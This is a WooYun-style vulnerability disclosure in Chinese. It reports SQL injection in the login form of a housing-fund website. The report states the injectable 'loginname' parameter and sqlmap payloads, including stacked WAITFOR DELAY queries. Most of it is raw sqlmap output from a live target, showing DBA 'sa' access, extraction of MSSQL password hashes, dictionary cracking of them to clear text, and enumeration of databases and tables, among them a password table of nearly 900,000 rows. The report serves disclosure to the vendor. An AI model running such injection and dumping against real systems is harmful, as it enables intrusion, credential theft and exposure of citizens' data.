乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-04: 细节已通知厂商并且等待厂商处理中 2015-09-07: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-17: 细节向核心白帽子及相关领域专家公开 2015-09-27: 细节向普通白帽子公开 2015-10-07: 细节向实习白帽子公开 2015-10-22: 细节向公众公开
登录处存在SQL注入,依旧是DBA权限,可系统交互shell。因跟第一处地址一样,一个是忘记密码的地方,这个是登录的地方,如果可以,管理员合并打包吧!~~~
http://**.**.**.**/bugs/wooyun-2015-0134350已经提交过未修复的地方,还有登录的地方存在注入,如下:1、地址
**.**.**.**:8080/hfgjj/jsp/web/private/login.jsp
2、抓包
**.**.**.**:8080/hfgjj/jsp/web/private/loginAction.jsp (POST)loginname=admin&password=123456
loginname存在注入3、sqlmap测试
[22:16:44] [INFO] loading tamper script 'between'[22:16:44] [INFO] loading tamper script 'randomcase'[22:16:44] [INFO] loading tamper script 'space2comment'[22:16:44] [INFO] testing connection to the target URL[22:16:44] [INFO] testing if the target URL is stable. This can take a couple of seconds[22:16:46] [INFO] target URL is stable[22:16:46] [INFO] testing if POST parameter 'loginname' is dynamic[22:16:46] [INFO] confirming that POST parameter 'loginname' is dynamic[22:16:46] [INFO] POST parameter 'loginname' is dynamic[22:16:46] [WARNING] heuristic (basic) test shows that POST parameter 'loginname' might not be injectable[22:16:46] [INFO] testing for SQL injection on POST parameter 'loginname'[22:16:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[22:16:47] [INFO] POST parameter 'loginname' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable[22:16:48] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft SQL Server'do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] y[22:16:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'[22:16:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'[22:16:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause'[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)'[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace'[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)'[22:16:51] [INFO] testing 'MySQL inline queries'[22:16:51] [INFO] testing 'PostgreSQL inline queries'[22:16:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'[22:16:51] [INFO] testing 'Oracle inline queries'[22:16:51] [INFO] testing 'SQLite inline queries'[22:16:51] [INFO] testing 'MySQL > 5.0.11 stacked queries'[22:16:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries'[22:16:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[22:17:02] [INFO] POST parameter 'loginname' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable[22:17:02] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[22:17:12] [INFO] POST parameter 'loginname' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable[22:17:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[22:17:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[22:17:19] [INFO] target URL appears to be UNION injectable with 19 columnsinjection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y[22:17:36] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. --dbms=mysql)POST parameter 'loginname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 127 HTTP(s) requests:---Place: POSTParameter: loginname Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: loginname=admin' AND 8526=8526 AND 'rgnd'='rgnd&password=123456 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: loginname=admin'; WAITFOR DELAY '0:0:5'--&password=123456 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: loginname=admin' WAITFOR DELAY '0:0:5'--&password=123456---[22:17:47] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[22:17:47] [INFO] testing Microsoft SQL Server[22:17:47] [INFO] confirming Microsoft SQL Server[22:17:48] [INFO] the back-end DBMS is Microsoft SQL Serverback-end DBMS: Microsoft SQL Server 2000[22:22:11] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[22:22:11] [INFO] the back-end DBMS is Microsoft SQL Serverback-end DBMS: Microsoft SQL Server 2000[22:22:11] [INFO] fetching current user[22:22:11] [INFO] retrieving the length of query output[22:22:11] [INFO] retrieved: 2[22:22:14] [INFO] retrieved: sacurrent user: 'sa'[22:22:14] [INFO] fetching current database[22:22:14] [INFO] retrieving the length of query output[22:22:14] [INFO] retrieved: 5[22:22:18] [INFO] retrieved: hfgjjcurrent database: 'hfgjj'[22:22:18] [INFO] testing if current user is DBAcurrent user is DBA: True[22:23:31] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[22:23:31] [INFO] the back-end DBMS is Microsoft SQL Serverback-end DBMS: Microsoft SQL Server 2000[22:23:31] [INFO] fetching database users[22:23:31] [INFO] fetching number of database users[22:23:31] [INFO] retrieved: 4[22:23:32] [INFO] retrieving the length of query output[22:23:32] [INFO] retrieved: 5[22:23:37] [INFO] retrieved: 12329[22:23:37] [INFO] retrieving the length of query output[22:23:37] [INFO] retrieved: 22[22:24:01] [INFO] retrieved: __I__IN_Administrators 17/22 (77%)[22:24:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:24:02] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')[22:24:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:24:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:24:04] [INFO] retrieved: BUI_TIN_Administrators 20/22 (91%)[22:24:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:24:08] [INFO] retrieved: BUILTIN_Administrators 21/22 (95%)[22:24:10] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request[22:24:13] [INFO] retrieved: BUILTIN\Administrators[22:24:13] [INFO] retrieving the length of query output[22:24:13] [INFO] retrieved: 6[22:24:21] [INFO] retrieved: hengke[22:24:21] [INFO] retrieving the length of query output[22:24:21] [INFO] retrieved: 2[22:24:24] [INFO] retrieved: sadatabase management system users [4]:[*] 12329[*] BUILTIN\\Administrators[*] hengke[*] sa[22:24:54] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[22:24:54] [INFO] the back-end DBMS is Microsoft SQL Serverback-end DBMS: Microsoft SQL Server 2000[22:24:54] [INFO] fetching database users password hashes[22:24:54] [INFO] fetching database users[22:24:54] [INFO] fetching number of database users[22:24:54] [INFO] resumed: 4[22:24:54] [INFO] retrieving the length of query output[22:24:54] [INFO] resumed: 5[22:24:54] [INFO] resumed: 12329[22:24:54] [INFO] retrieving the length of query output[22:24:54] [INFO] resumed: 22[22:24:54] [INFO] resumed: BUILTIN\\Administrators[22:24:54] [INFO] retrieving the length of query output[22:24:54] [INFO] resumed: 6[22:24:54] [INFO] resumed: hengke[22:24:54] [INFO] retrieving the length of query output[22:24:54] [INFO] resumed: 2[22:24:54] [INFO] resumed: sa[22:24:54] [INFO] fetching number of password hashes for user '12329'[22:24:54] [INFO] retrieved: 1[22:24:55] [INFO] fetching password hashes for user '12329'[22:24:55] [INFO] retrieving the length of query output[22:24:55] [INFO] retrieved: 94[22:25:17] [INFO] retrieved: 0__100f0_08170__f_f_______________ 13/94 (14%)[22:25:17] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:25:17] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')[22:25:22] [INFO] retrieved: 0x_100f0_08170__faf_5_e6__________ 18/94 (19%)[22:25:22] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:25:27] [INFO] retrieved: 0x0100f0_08170__faf_5_e66_3_______ 21/94 (22%)[22:25:27] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:25:27] [INFO] retrieved: 0x0100f0_08170__faf_5_e66_38______ 22/94 (23%)[22:25:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:25:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:25:34] [INFO] retrieved: 0x0100f07081700cfaf_59e66_38e_2___ 28/94 (30%)[22:25:37] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:25:43] [INFO] retrieved: ..081700cfaf759e66_38e_2f3b____6_.. 34/94 (36%)[22:25:44] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:25:48] [INFO] retrieved: ..081700cfaf759e66438e_2f3b_8_166.. 38/94 (40%)[22:25:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:25:51] [INFO] retrieved: ..00cfaf759e66438e_2f3b_8_166_5_9.. 41/94 (44%)[22:25:51] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:25:55] [INFO] retrieved: ..00cfaf759e66438e_2f3b_8_16645d9.. 43/94 (46%)[22:25:55] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:26:08] [INFO] retrieved: ..ea2f3b_8_16645d9e13_8_db_e0c_af.. 54/94 (57%)[22:26:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:26:13] [INFO] retrieved: ..b_8_16645d9e13_8_db_e0c_af_59e6.. 59/94 (63%)[22:26:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:26:15] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:26:16] [INFO] retrieved: .._16645d9e13d8_db_e0c_af_59e664_.. 62/94 (66%)[22:26:17] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:26:18] [INFO] retrieved: ..716645d9e13d8_db_e0c_af_59e664_.. 63/94 (67%)[22:26:18] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:26:25] [INFO] retrieved: ..3d8ddb7e0c_af_59e664_8ea_f_b___.. 70/94 (74%)[22:26:26] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:26:29] [INFO] retrieved: ..8ddb7e0c_af_59e664_8ea_f3b____6.. 72/94 (77%)[22:26:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:26:35] [INFO] retrieved: ..b7e0c_af759e664_8ea_f3b__716_45.. 78/94 (83%)[22:26:35] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:26:35] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:26:44] [INFO] retrieved: ..af759e66438ea_f3ba8716_45d9_1_d.. 84/94 (89%)[22:26:45] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:26:50] [INFO] retrieved: ..9e66438ea2f3ba8716645d9_13d8ddb7e 93/94 (99%)[22:26:56] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request[22:26:59] [INFO] retrieved: 0x0100f07081700cfaf759e66438ea2f3ba8716645d9e13d8ddb7e0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e[22:26:59] [INFO] fetching number of password hashes for user 'BUILTIN\Administrators'[22:26:59] [INFO] retrieved: 0[22:27:01] [WARNING] unable to retrieve the number of password hashes for user 'BUILTIN\Administrators'[22:27:01] [INFO] fetching number of password hashes for user 'hengke'[22:27:01] [INFO] retrieved: 1[22:27:03] [INFO] fetching password hashes for user 'hengke'[22:27:03] [INFO] retrieving the length of query output[22:27:03] [INFO] retrieved: 94[22:27:24] [INFO] retrieved: 0x010_d___fb4_cf379_d_____________ 15/94 (16%)[22:27:26] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request[22:27:27] [INFO] retrieved: 0x010_d___fb4_cf379_d__a__________ 16/94 (17%)[22:27:28] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request[22:27:28] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request[22:27:31] [INFO] retrieved: 0x010_d___fb4_cf379dd1_aa_________ 19/94 (20%)[22:27:33] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request[22:27:33] [INFO] retrieved: 0x010_d__afb4_cf379dd1_aa_________ 20/94 (21%)[22:27:34] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:27:47] [INFO] retrieved: ..db4afb45cf379dd1faa__d59_a4____.. 32/94 (34%)[22:27:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:27:49] [INFO] retrieved: ..db4afb45cf379dd1faab_d59_a4b___.. 34/94 (36%)[22:27:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:27:54] [INFO] retrieved: ..b45cf379dd1faabfd59_a4b__83d___.. 38/94 (40%)[22:27:55] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:00] [INFO] retrieved: ..f379dd1faabfd592a4b__83d_b_6e_c.. 42/94 (45%)[22:28:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:06] [INFO] retrieved: ..faabfd592a4b6_83d_b_6e1c_d_993_.. 48/94 (51%)[22:28:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:07] [INFO] retrieved: ..faabfd592a4b6_83d_b_6e1c1d_993_.. 49/94 (52%)[22:28:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:20] [INFO] retrieved: ..4b6c83d0b56e1c1d59930_ba0_c5c__.. 61/94 (65%)[22:28:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:28] [INFO] retrieved: ..d0b56e1c1d59930_ba0_c5c__75___e.. 63/94 (67%)[22:28:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:31] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:39] [INFO] retrieved: ..d0b56e1c1d59930_ba0ec5c2_75___e.. 65/94 (69%)[22:28:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:39] [INFO] retrieved: ..d0b56e1c1d59930_ba0ec5c2_75_a_e.. 66/94 (70%)[22:28:41] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:41] [INFO] retrieved: ..e1c1d59930_ba0ec5c2_75_a_e_9___.. 67/94 (71%)[22:28:41] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:49] [INFO] retrieved: ..1d599309ba0ec5c2775_ace39_4d_0_.. 75/94 (80%)[22:28:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:58] [INFO] retrieved: ..ba0ec5c2775dace3924d_0_c80__900.. 83/94 (88%)[22:28:58] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:28:59] [INFO] retrieved: ..ec5c2775dace3924d_0_c80__900c6_.. 84/94 (89%)[22:29:00] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:29:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:29:12] [INFO] retrieved: ..2775dace3924d902c804_900c6b0df944 93/94 (99%)[22:29:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:29:18] [INFO] retrieved: 0x0100db4afb45cf379dd1faabfd592a4b6c83d0b56e1c1d599309ba0ec5c2775dace3924d902c8041900c6b0df944[22:29:18] [INFO] fetching number of password hashes for user 'sa'[22:29:18] [INFO] retrieved: 1[22:29:19] [INFO] fetching password hashes for user 'sa'[22:29:19] [INFO] retrieving the length of query output[22:29:19] [INFO] retrieved: 94[22:29:38] [INFO] retrieved: 0x_1_0d__1_35b39_c_61_____________ 14/94 (15%)[22:29:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:29:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:29:39] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:29:41] [INFO] retrieved: 0x_1_0d__1_35b39_c_61_be__________ 16/94 (17%)[22:29:42] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:29:43] [INFO] retrieved: 0x_1_0d3_1_35b39_ce619be__________ 19/94 (20%)[22:29:43] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:30:01] [INFO] retrieved: ..1535b397ce619be__c4_2592e8_b_7_.. 34/94 (36%)[22:30:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:30:03] [INFO] retrieved: ..1535b397ce619be87c4_2592e8_b_7_.. 36/94 (38%)[22:30:03] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:30:08] [INFO] retrieved: ..397ce619be87c4_2592e80b_7_c0__7.. 41/94 (44%)[22:30:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:30:12] [INFO] retrieved: ..7ce619be87c4_2592e80b_7_c0_6713.. 45/94 (48%)[22:30:12] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:30:24] [INFO] retrieved: ..4a2592e80b_7_c006713a7_aac_6__f.. 53/94 (56%)[22:30:24] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request[22:30:31] [INFO] retrieved: ..2e80b57_c006713a72aac_6_6f04f2_.. 60/94 (64%)[22:30:31] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:30:32] [INFO] retrieved: ..80b57_c006713a72aac_6_6f04f2__d.. 61/94 (65%)[22:30:33] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:30:43] [INFO] retrieved: ..006713a72aac_606f04f250d_0_9__d.. 68/94 (72%)[22:30:44] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:30:48] [INFO] retrieved: ..72aac_606f04f250d_0_9_cd3d5f___.. 72/94 (77%)[22:30:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:30:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:30:52] [INFO] retrieved: ..72aac_606f04f250d80f9_cd3d5f_c9.. 76/94 (81%)[22:30:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:30:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:31:03] [INFO] retrieved: ..04f250d80f97cd3d5f7c9_f_aa__6f_.. 85/94 (90%)[22:31:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[22:31:11] [INFO] retrieved: ..250d80f97cd3d5f7c97fcaa_96fba05ae 93/94 (99%)[22:31:13] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request[22:31:15] [INFO] retrieved: 0x0100d341535b397ce619be87c4a2592e80b579c006713a72aacc606f04f250d80f97cd3d5f7c97fcaad96fba05aedo you want to store hashes to a temporary file for eventual further processingwith other tools [y/N] ydo you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y[22:31:47] [INFO] using hash method 'mssql_old_passwd'what dictionary do you want to use?[1] default dictionary file 'E:\Sqlmap\txt\wordlist.zip' (press Enter)[2] custom dictionary file[3] file with list of dictionary files>[22:31:57] [INFO] using default dictionarydo you want to use common password suffixes? (slow!) [y/N] y[22:31:59] [INFO] starting dictionary-based cracking (mssql_old_passwd)[22:31:59] [INFO] starting 2 processes[22:32:53] [INFO] cracked password '12329' for user '12329'[22:33:45] [INFO] cracked password 'sa' for user 'sa'[22:34:49] [INFO] cracked password 'hengke' for user 'hengke'database management system users password hashes:[*] 12329 [1]: password hash: 0x0100f07081700cfaf759e66438ea2f3ba8716645d9e13d8ddb7e0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e header: 0x0100 salt: f0708170 mixedcase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e uppercase: 0cfaf759e66438ea2f3ba8716645d9e13d8ddb7e clear-text password: 12329[*] hengke [1]: password hash: 0x0100db4afb45cf379dd1faabfd592a4b6c83d0b56e1c1d599309ba0ec5c2775dace3924d902c8041900c6b0df944 header: 0x0100 salt: db4afb45 mixedcase: cf379dd1faabfd592a4b6c83d0b56e1c1d599309 uppercase: ba0ec5c2775dace3924d902c8041900c6b0df944 clear-text password: hengke[*] sa [1]: password hash: 0x0100d341535b397ce619be87c4a2592e80b579c006713a72aacc606f04f250d80f97cd3d5f7c97fcaad96fba05ae header: 0x0100 salt: d341535b mixedcase: 397ce619be87c4a2592e80b579c006713a72aacc uppercase: 606f04f250d80f97cd3d5f7c97fcaad96fba05ae clear-text password: sa[22:36:49] [WARNING] changes made by tampering scripts are not included in show payload content(s)[22:36:49] [INFO] the back-end DBMS is Microsoft SQL Serverback-end DBMS: Microsoft SQL Server 2000[22:36:49] [INFO] fetching database names[22:36:49] [INFO] fetching number of databases[22:36:49] [INFO] retrieved: 7[22:36:49] [INFO] retrieving the length of query output[22:36:49] [INFO] retrieved: 3[22:36:52] [INFO] retrieved: gjj[22:36:52] [INFO] retrieving the length of query output[22:36:52] [INFO] retrieved: 6[22:37:00] [INFO] retrieved: hengke[22:37:00] [INFO] retrieving the length of query output[22:37:00] [INFO] retrieved: 5[22:37:06] [INFO] retrieved: hfgjj[22:37:06] [INFO] retrieving the length of query output[22:37:06] [INFO] retrieved: 6[22:37:13] [INFO] retrieved: master[22:37:13] [INFO] retrieving the length of query output[22:37:13] [INFO] retrieved: 5[22:37:19] [INFO] retrieved: model[22:37:19] [INFO] retrieving the length of query output[22:37:19] [INFO] retrieved: 4[22:37:25] [INFO] retrieved: msdb[22:37:25] [INFO] retrieving the length of query output[22:37:25] [INFO] retrieved: 6[22:37:31] [INFO] retrieved: tempdbavailable databases [7]:[*] gjj[*] hengke[*] hfgjj[*] master[*] model[*] msdb[*] tempdbDatabase: gjj[53 tables]+----------------------+| CULTURE_INVESTDETAIL || CULTURE_INVESTED || D99_CMD || INNER_INFO || LIFA_NEWS || SYS_MENU || SYS_SITE || SYS_SITERIGHT || SYS_USERGROUP || sys_r`le_resource || advise_upload || class_supply || cms_hdjl || culture_info || culture_replyinfo || dtproperties || fagui || fellow_class || fellow_link || focus_user || hdzx || hero_table || join_table || kill_kk || mail_material || pbcatcol || pbcatedt || pbcatfmt || pbcattbl || pbcatvld || renyuan || renyuan_dw || supply_note || supply_replynote || sys_log || sys_resource || sys_role || sys_siteprevilige || sys_unit || sys_unit_role || sys_unittype || sys_user || sys_user_role || sys_user_unit || sys_userproperty || sysconstraints || syssegments || tongji || v_168_dwdz || v_168_dwhjqk || v_168_dwinfo || v_168_dz || v_168_info |+----------------------+Database: gjj+--------------------------+---------+| Table | Entries |+--------------------------+---------+| dbo.v_168_dwhjqk | 69152 || dbo.sys_log | 6291 || dbo.v_168_dwinfo | 3317 || dbo.tongji | 629 || dbo.v_168_dwdz | 385 || dbo.SYS_SITERIGHT | 352 || dbo.cms_hdjl | 108 || dbo.fagui | 102 || dbo.supply_note | 69 || dbo.sys_resource | 68 || dbo.sys_user_role | 38 || dbo.mail_material | 34 || dbo.supply_replynote | 34 || dbo.SYS_MENU | 31 || dbo.focus_user | 30 || dbo.kill_kk | 21 || dbo.pbcatedt | 21 || dbo.pbcatfmt | 20 || dbo.CULTURE_INVESTDETAIL | 13 || dbo.hero_table | 12 || dbo.renyuan | 12 || dbo.sys_role | 8 || dbo.advise_upload | 6 || dbo.D99_CMD | 5 || dbo.sys_user | 5 || dbo.sys_user_unit | 5 || dbo.INNER_INFO | 4 || dbo.renyuan_dw | 4 || dbo.class_supply | 3 || dbo.syssegments | 3 || dbo.CULTURE_INVESTED | 2 || dbo.fellow_class | 2 || dbo.fellow_link | 2 || dbo.sys_unittype | 2 || dbo.sysconstraints | 2 || dbo.LIFA_NEWS | 1 || dbo.SYS_SITE | 1 || dbo.sys_siteprevilige | 1 |+--------------------------+---------+[01:16:59] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[01:16:59] [INFO] the back-end DBMS is Microsoft SQL Serverback-end DBMS: Microsoft SQL Server 2000[01:16:59] [INFO] fetching tables for database: hengke[01:16:59] [INFO] fetching number of tables for database 'hengke'[01:16:59] [INFO] retrieved: 418[01:17:00] [INFO] retrieving the length of query output[01:17:00] [INFO] retrieved: 15[01:17:18] [INFO] retrieved: db__Ct__C_annel 10/15 (67%)[01:17:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:17:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:17:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:17:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:17:21] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:17:21] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')[01:17:29] [INFO] retrieved: dbo.Cti_Channel[01:17:29] [INFO] retrieving the length of query output[01:17:29] [INFO] retrieved: 14[01:17:45] [INFO] retrieved: dbo.C_____dSet 9/14 (64%)[01:17:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:17:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:17:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:17:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:17:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[01:17:57] [INFO] retrieved: dbo.Cti_ModSet[01:17:57] [INFO] retrieving the length of query output[01:17:57] [INFO] retrieved: 14[01:18:14] [INFO] retrieved: dbo.C_____cord 9/14 (64%)418个表,速度太慢,就不继续了因上个已经注入过了,就不继续该数据库了Database: hfgjj[109 tables]+----------------------+| CULTURE_INVESTDETAIL || CULTURE_INVESTED || D99_CMD || D99_REG || D99_Tmp || DIY_TEMPTALBLE || INNER_INFO || LIFA_NEWS || SYS_MENU || SYS_SITERIGHT || SYS_USERGROUP || WELFARE_NEWS || advise_upload || class_supply || cms_hdjl || culture_info || culture_replyinfo || dtproperties || fagui || fellow_class || fellow_link || focus_user || h_fangjian || h_loudong || h_loupan || h_quyu || hdzx || hero_table || join_table || kill_kk || mail_material || pbcatcol || pbcatedt || pbcatfmt || pbcattbl || pbcatvld || renyuan_dw || renyuan_dw || sqlmapoutput || supply_note || supply_replynote || sys_log || sys_resource || sys_role_resource || sys_role_resource || sys_siteprevilige || sys_siteprevilige || sys_unit_role || sys_unit_role || sys_unittype || sys_user_role || sys_user_role || sys_user_unit || sys_userproperty || sysconstraints || syssegments || tongji || tz_js || tz_note || v_09_10_xh || v_168_dwdz || v_168_dwhjqk_old || v_168_dwhjqk_old || v_168_dwinfo || v_168_dwzz_old || v_168_dwzz_old || v_168_dz1 || v_168_dz2 || v_168_dz_old_61 || v_168_dz_old_61 || v_168_dz_old_61 || v_168_dz_old_65 || v_168_dz_old_66 || v_168_dz_old_67 || v_168_dz_old_68 || v_168_dz_old_yl || v_168_gjd || v_168_info_old || v_168_info_old || v_dw_gjmx_old || v_dw_gjmx_old || v_dw_gzmx || v_dwhjqk_old || v_dwhjqk_old || v_dwzz_old || v_house_info || v_save_etps_password || v_save_password || v_update_Time || v_web_hdmx || v_web_hdqk1 || v_web_hdqk1 || v_web_sdqk || v_web_shgc || v_web_wtmx09 || v_web_wtmx10 || v_web_wtmx11 || v_web_wtmx12 || v_web_wttqmx_old || v_web_wttqmx_old || v_web_wttqmx_old || web_dwinfo || wenjian || xzsp_dw || xzsp_dw || xzxk || zhut || zxbs || ?? |+----------------------+Database: hfgjj+--------------------------+---------+| Table | Entries |+--------------------------+---------+| dbo.v_168_dz1 | 7603650 || dbo.v_web_hdmx | 6436608 || dbo.v_dw_gjmx_old | 1220549 || dbo.v_dw_gjmx_old | 1220549 || dbo.v_web_wttqmx_old | 1071690 || dbo.v_web_wttqmx_old | 1071690 || dbo.v_web_wttqmx_old | 1071690 || dbo.v_save_password | 895507 || dbo.v_web_shgc | 497282 || dbo.v_168_dwhjqk_old | 441669 || dbo.v_168_dwhjqk_old | 441669 || dbo.v_dwhjqk_old | 438713 || dbo.v_dwhjqk_old | 438713 || dbo.v_168_dz_old_yl | 424834 || dbo.v_168_info_old | 374905 || dbo.v_168_info_old | 374905 || dbo.v_web_wtmx12 | 238842 || dbo.v_168_dwzz_old | 